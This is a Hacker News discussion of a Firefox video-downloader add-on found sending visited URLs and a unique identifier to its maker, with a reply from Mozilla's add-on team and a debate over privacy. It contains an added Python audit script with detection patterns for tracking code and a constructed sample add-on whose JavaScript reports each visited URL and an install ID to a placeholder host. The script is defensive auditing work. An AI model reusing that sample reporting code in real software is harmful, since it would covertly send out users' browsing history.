Firefox add-on with 7m downloads secretly tracks your browsing history (iwtf.net)
170 points by toni on May 20, 2011 | hide | past | web | favorite | 56 comments



I'm from the add-ons team at Mozilla.

We've looked into the Ant Video Player and found that it does send information about websites users visit in order to power its ranking feature displayed for each website, and also includes a unique identifier in this communication. While this does not violate our policies, we do require it to be disclosed in the privacy policy and the add-on's description. We have contacted the developer and asked them to correct this.

The developer has been in communication with us and says that they destroy all user-identifiable information from their logs, and that their privacy policy and add-on description will be updated to reflect that. They'll also show a notice about this on their first-run website.

Additionally, the AntRank feature that uses this tracking can be disabled.

Add-ons publicly available in our gallery have been reviewed for security problems, and add-ons that aren't marked as experimental have been fully reviewed for a range of other issues as described in our hosting policies. Because developers set their own privacy policies and can update them any time, it is more difficult for us to review them for compliance with their own rules. We encourage users to always read an add-on's privacy policy if one is provided and to use the Report Abuse link if anything suspicious is noticed.


You should also require that AntRank be disabled while in private browsing mode.


Private Browsing Mode is for browsing without storing information on your computer. It has nothing to do with websites tracking you; that's what the Do Not Track feature is. We do require that add-ons respect Private Browsing Mode, and our privacy team is working on a recommendation (not a requirement) that add-ons also honor the user's Do Not Track preferences.

As the person who implemented Private Browsing describes: Private Browsing aims to help you make sure that your web browsing activities don't leave any trace on your own computer. It is very important to note that Private Browsing is not a tool to keep you anonymous from websites or your ISP, or for example protect you from all kinds of spyware applications which use sophisticated techniques to intercept your online traffic. Private Browsing is only about making sure that Firefox doesn't store any data which can be used to trace your online activities, no more, no less.

http://ehsanakhgari.org/blog/2008-11-04/dont-leave-trace-pri...


You should create a policy that completely prohibits this behavior.


Not everyone has the same values as you. There's nothing inherently wrong with not caring if somebody knows where you surf, and being interested in the recommendations that their tool can provide.

Disclosure is good. Homogeneity and coercion are bad.


Exactly. From what I can tell, there's not much difference between the information ant is collecting and that that's regularly sent back to Google from Chrome, except that the latter is likely even more invasive.


And why does Google's invasion of privacy make this okay?

This is why the governments of the world need to implement do not track laws.


The very last thing we need is for the government to put more regulation on the Internet. The only thing that's kept their heavy hands from destroying things so far is that they're also incompetent with technical issues.


I'm fine with reasonable regulation. When you have an oligopoly controlling the infrastructure, having regulations that say they can't sell preferential access to that infrastructure to other oligopolies is a good thing. The key metric of what's good for the consumer is competition, not regulation. Regulation that stifles competition is bad. Regulation that protects it is good. Regulation itself is simply a tool, and its moral worth lies in how it's used.


Regulation that protects [competition] is good.

Not necessarily. There's no point in using regulation to preserve competition between buggy whip manufacturers. Creative destruction puts an end to many industries. And in some cases, its death throes can easily look like a market failure rather than market success.

In the end, who decides if it's a buggy whip industry? And who decides if a corporation is an oligopoly? Remember, it's likely that in any mature, regulated industry, the regulators are probably industry insiders themselves (see "Regulatory Capture", https://secure.wikimedia.org/wikipedia/en/wiki/Regulatory_ca... ).


Your original post struck a very anti-net neutrality tone. My point was that government regulation in that area, as well as others, can protect both consumers and innovation. If we let any company merge with any other, we would soon have monopolies that stifle competition and gouge consumers.

Not all regulation is bad, just like not all effects of slavish adherence to free market ideals are good. The free market is good in aggregate, but there are many cases where government intervention is beneficial.


Very well, I suppose some people might want to be tracked like a bunch of cattle. In the event that someone does want to do this, then they should have to opt-in. The default should not be opt-out for something as invasive as this.

If Apple were caught doing this, there would be a hearing in front of congress.


"This add-on has been preliminarily reviewed by Mozilla."

What that entails:

"When performing a preliminary review, editors will review the source code for security issues and major policy violations, but will not install the add-on to test functionality in most cases. Preliminary review will be granted unless a security vulnerability or major policy violation is discovered."

From: https://addons.mozilla.org/en-US/developers/docs/policies/re...

Extensions marked 'experimental' are not fully reviewed. Which is why they probably left this plugin marked as 'experimental'.

You can't blame the users since they are installing from a Mozilla page and trusting the brand. I hope this triggers a review of those procedures at Mozilla, since I would consider sending back every site you visit a 'major policy violation'. Very scary.

Edit: they may also want to change the 'experimental' policy and set a time limit to how long an extension can remain experimental, and not list them in the default directory unless users (more advanced users) specifically seek out experimental extensions


I'm not sure if this is still the case, but you used to have to make an account and log in to actually install an experimental add on. There was also a clear warning as well.

I definitely agree with setting a time limit, if feasible.


It also makes you wonder what "Verified Safe by Norton" means on the page for their video downloader.

http://www.ant.com/video-downloader

http://safeweb.norton.com/report/show?url=www.ant.com

The community rating contradicts norton's rating.... sigh.


A quick fgrep found the code making the requests to their servers: http://pastie.org/1932287

Edit: Further code browsing points to the "rank" feature. They rank all URLs that are http/https and the host isn't "localhost". I'm guessing, but if you turn off ranking in the preferences, it will stop logging your page views.


Why not try and track down Dima Sidorchenko (the guy in the header of the source)?

Google thinks the name is Dima Sidorenko and offers up this guy who is a programmer: http://twitter.com/#!/shadow1278

Unless it is Sidorchenko and Dima is a nickname in which case "Dmitriy Sidorchenko" might get better results.


Dima is a standard Russian-language short form for Dmitriy. Like Pete for Peter in English.

The name Sidorchenko sounds Ukrainian.


The files I've looked at have been authored by many different people. (Seed, Zak, RigoNet, Camille, Dmitriy, Dima Sidorchenko, etc.) I don't think Dima is solely responsible for this. The company that had this written should be responsible.


I don't really see the issue here, isn't all of that stated in the privacy policy of the extension ?

https://addons.mozilla.org/en-US/firefox/addon/video-downloa...

Ant.com collects non-personally-identifying information when you are visiting our site or using our software applications, this infomation made available typically from web browsers and servers. Some of the infomation type is: the Uniform Resource Locator (URL) of the web page from wich you came, the date and the time for each page you view, settings such as browser languages, etc.

Ant.com also collects infomation made public to us that can be considered personally identifyable, such as your internet protocol (IP) address. Ant.com does not use such information to identify its visitors and does not disclose such information.


"The web page from wich you came" is just the HTTP "Referer" field; almost every web site in existence collects that as a matter of course. To claim that it covers universal monitoring of all users' web traffic is obscene.

I'm also fairly sure that one can find personally "identifyable" information from URLs that go far beyond mere IP addresses.

Why is ant.com domain info privacy protected anyhow? Seems pretty fishy to me.


The lesson here: don't install shady addons, just as you aren't installing every damn toolbar out there.

Also, this is enough to sue, isn't it?


Rather depressingly, this wasn't so much a shady add-on, as one that was meant to have been vetted by Mozilla.

From the Mozilla Add-Ons FAQ @ https://addons.mozilla.org/en-US/firefox/faq

Are add-ons safe to install? Unless clearly marked otherwise, add-ons available from this gallery have been checked and approved by Mozilla's team of editors and are safe to install. We recommend that you only install approved add-ons. If you wish to install unapproved add-ons or add-ons from third-party websites, use caution as these add-ons may harm your computer or violate your privacy. Learn more about our approval process


"Unless clearly marked otherwise"

This add-on was marked otherwise. (Well, according to the claims above.)

You can definitely argue that having unvetted add-ons on the site at all is bad, but your particular point isn't relevant.


about 150,000 people have downloaded the bit.ly preview add-on, which tells bit.ly everything you visit: http://go-to-hellman.blogspot.com/2010/05/bitly-preview-add-...


Bigend at work? Blue-Ant? Thanks, Mr. Gibson...

And thanks to Simon, I am having a hard enough time with my work and personal to do lists, testing all of my tools for their extranet behaviors is not something I look forward to adding to them...


Privacy policy or not - if its purpose is to be a video downloader, but it tracks stuff when you are doing something other than video downloading - it's sneaky at best, however it's presented.


And that's why I have Little Snitch on my machine.


I have Little Snitch on my machine too, but I've set up a rule that allows my browser to make calls to port 80.

Are you saying you don't have a generic rule in place, and are instead using Little Snitch to approve calls to port 80 for every new domain you visit? If so, that'd certainly work, but it seems more than a little impractical.


> Are you saying you don't have a generic rule in place, and are instead using Little Snitch to approve calls to port 80 for every new domain you visit?

Yes. And I do the same with cookies.

I do allow connections (and cookies) permanently to "trusted sites", but that's the exception rather than the rule.


Wow, and here I thought I was the only one that did that! I do the same, though with Opera's built-in cookie control features.


I've seen this before in another smaller extension (I can't remember which) while I was studying how it worked, but fortunately the code was commented.

Firefox extensions are just plain zip files, I wonder why he hasn't checked the code.
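The two comments above (the fgrep that located the request code, and the observation that an XPI is just a zip file) describe an audit any user can repeat before trusting an add-on. The script below is an added example written for this thread, not code from the original post, from Mozilla, or from Ant.com: it opens an XPI as a zip, reads the text members, and reports the indicators a reviewer would look for (XMLHttpRequest use, hard-coded remote hosts, reads of the current page URL, and identifier-like parameter names). The pattern list and the sample XPI it builds are constructed assumptions for illustration; the sample does not reproduce the Ant add-on's code, and `example.invalid` is a placeholder host.

```python
"""Audit a Firefox XPI (a plain zip file) for code that could report browsing data.

Added example for this thread; not the add-on's own code. The pattern list is an
assumption about what outbound reporting looks like in XUL-era extension JavaScript.
"""
import io
import re
import sys
import zipfile

# Indicators a reviewer would grep for (constructed list for this example).
SUSPICIOUS_PATTERNS = {
    "xhr": re.compile(r"XMLHttpRequest|nsIXMLHttpRequest"),
    "remote_url": re.compile(r"https?://[A-Za-z0-9.-]+"),
    "page_url_access": re.compile(r"currentURI|location\.href|document\.URL"),
    "identifier": re.compile(r"\b(uid|uuid|unique_?id|client_?id)\b", re.IGNORECASE),
}

# Only members with these extensions are decoded and scanned as text.
TEXT_EXTENSIONS = (".js", ".jsm", ".xul", ".rdf", ".manifest", ".json")


def scan_xpi_bytes(data):
    """Return {member_name: {pattern_name: [unique matches]}} for members that hit."""
    findings = {}
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if info.is_dir() or not info.filename.endswith(TEXT_EXTENSIONS):
                continue
            text = zf.read(info.filename).decode("utf-8", errors="replace")
            hits = {}
            for name, pattern in SUSPICIOUS_PATTERNS.items():
                matches = sorted({m.group(0) for m in pattern.finditer(text)})
                if matches:
                    hits[name] = matches
            if hits:
                findings[info.filename] = hits
    return findings


def remote_hosts(findings):
    """Collect the distinct hosts named in hard-coded URLs across all findings."""
    hosts = set()
    for hits in findings.values():
        for url in hits.get("remote_url", []):
            hosts.add(re.sub(r"^https?://", "", url))
    return sorted(hosts)


def build_sample_xpi():
    """Build a constructed sample XPI in memory (not the real add-on's contents)."""
    rank_js = """// constructed sample: reports each visited URL with a per-install id
var RANK_ENDPOINT = "http://example.invalid/rank";
function reportVisit(doc) {
  var url = doc.location.href;
  if (!/^https?:/.test(url) || doc.location.hostname == "localhost") return;
  var req = new XMLHttpRequest();
  req.open("GET", RANK_ENDPOINT + "?uid=" + installId + "&url=" + encodeURIComponent(url));
  req.send(null);
}
"""
    ui_js = """// constructed sample: plain UI code with no network activity
function toggleButton(enabled) {
  document.getElementById("dl-button").disabled = !enabled;
}
"""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("install.rdf", "<RDF/>")
        zf.writestr("chrome/content/rank.js", rank_js)
        zf.writestr("chrome/content/ui.js", ui_js)
    return buf.getvalue()


if __name__ == "__main__":
    # Pass a real .xpi path to scan it; with no argument, scan the constructed sample.
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample_xpi()
    results = scan_xpi_bytes(data)
    for member, hits in results.items():
        print(member)
        for name, matches in hits.items():
            print("  %-16s %s" % (name, ", ".join(matches)))
    print("remote hosts:", ", ".join(remote_hosts(results)) or "(none)")
```

A hit is a lead, not a verdict: an add-on legitimately fetching its own update manifest will also match `remote_url`, so the point of the report is to show which files combine a read of the page URL with a request to a remote host, which is exactly the combination the fgrep in the thread turned up.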


I'm not familiar with Mozilla's add-on policies. Is this an issue due to the user tracking? Or is it because the privacy policy didn't make it clear this was happening?


do a 'whois' on ant.com. I thought it interesting.


Why, because they have whois privacy? That's not so unusual.


For individuals, e.g. blogs and the like; sure. Something which seems awfully like a company (it looks like they're trying to build a search engine); that's much dodgier to my mind.


Yet another reason to browse through an interception proxy. Know what you are sending -- it can be enlightening.


The Ant Video Downloader has been reported as spyware.


Spoiler: Submission title is bait. He calls out "ant video downloader".


You should talk to a good attorney and file a Lawsuit against Mozilla and Ant.com, this could be big!


Seems like an overreaction, imho. This is likely a case of poor Privacy Policy writing and general ineptitude, rather than deliberate evil.

From their feature list: "Easy to use : when a video is detected, the download button becomes clickable." - i.e. our plugin sends all URLs to us for analysis, we respond telling the plugin whether to activate the button

"Integrated Traffic Rank indicator for all the sites you visit." - i.e. we need a way of measuring unique visits to everything

Still, interesting, and good on this guy for bringing it into the public eye.


but absolutely none of that requires a unique identifier, which is where this article focuses most of its gripe.


It seems like the "Integrated Traffic Rank indicator" could, if they wanted to distinguish uniqueness by users rather than unique IPs.

Not that it's a good idea.


While I usually follow "do not ascribe to malice that which is adequately explained by stupidity", I don't think this case is adequately explained by stupidity.


oh no! say it isn't true!!! it tracks our browsing history!!??!?! that's like as bad as dropping bombs on 8 year olds in iraq isn't it!


Chrome tracks your browsing history... why do people suddenly care when there's an addon for Firefox that does that?


I'd like to see some proof of that. Or in the words of Wikipedia, 'Citation Needed'


Chrome sends every keypress in the URL bar back to Google. http://www.google.com/chrome/intl/en/privacy.html "When you type URLs or queries in the address bar, the letters you type are sent to your default search engine so the Suggest feature can automatically recommend terms or URLs you may be looking for."


The autocompletion can easily be turned off.

Anyhow, what is typed on the URL bar is only a small subset of sites visited.


I'd like to see some proof as well. While there is some tracking involved in Chrome, I doubt they track browser history as well.


Perhaps the OP was referring to the URL bar sending auto complete requests to google, which some consider tracking...

I don't really know of anything else Chrome does by default that "tracks your history" like this addon does.


Like Apple products, Firefox branded itself as malware proof.

---

http://web.archive.org/web/20041127034451/http://www.mozilla...

"“Beware of spyware. If you can, use the Firefox browser.” - USA Today"

"Privacy and Security

Built with your security in mind, Firefox keeps your computer safe from malicious spyware by not loading harmful ActiveX controls. A comprehensive set of privacy tools keep your online activity your business."

---

While that's technically correct - Firefox couldn't (can't?) load ActiveX controls, therefore it couldn't load harmful ActiveX controls - the Firefox extensions system has permitted installation of executable code for a long time, if not since its inception. Since that's what ActiveX is, more or less, Firefox has never been any more secure in that respect than e.g. Internet Explorer.

Like Apple products, as Firefox becomes more popular (and therefore a juicier attack target) there will be more malware that targets it.


The difference being that you have to decide to install this harmful extension. ActiveX just gets loaded during regular browsing.


ActiveX hasn't worked that way for a long time. At least since XP SP2, released 2004. Possibly even before then - I'm not sure exactly what XP SP2 changed.

Edit: Fix typo.


Are you blaming Mozilla/Firefox for every possible 3rd party misuse of their software?


No. And rereading my post, I'm just not seeing any blame.

I'm presenting some pertinent history and tying it to the recent Apple malware news, which has been heavily discussed here.

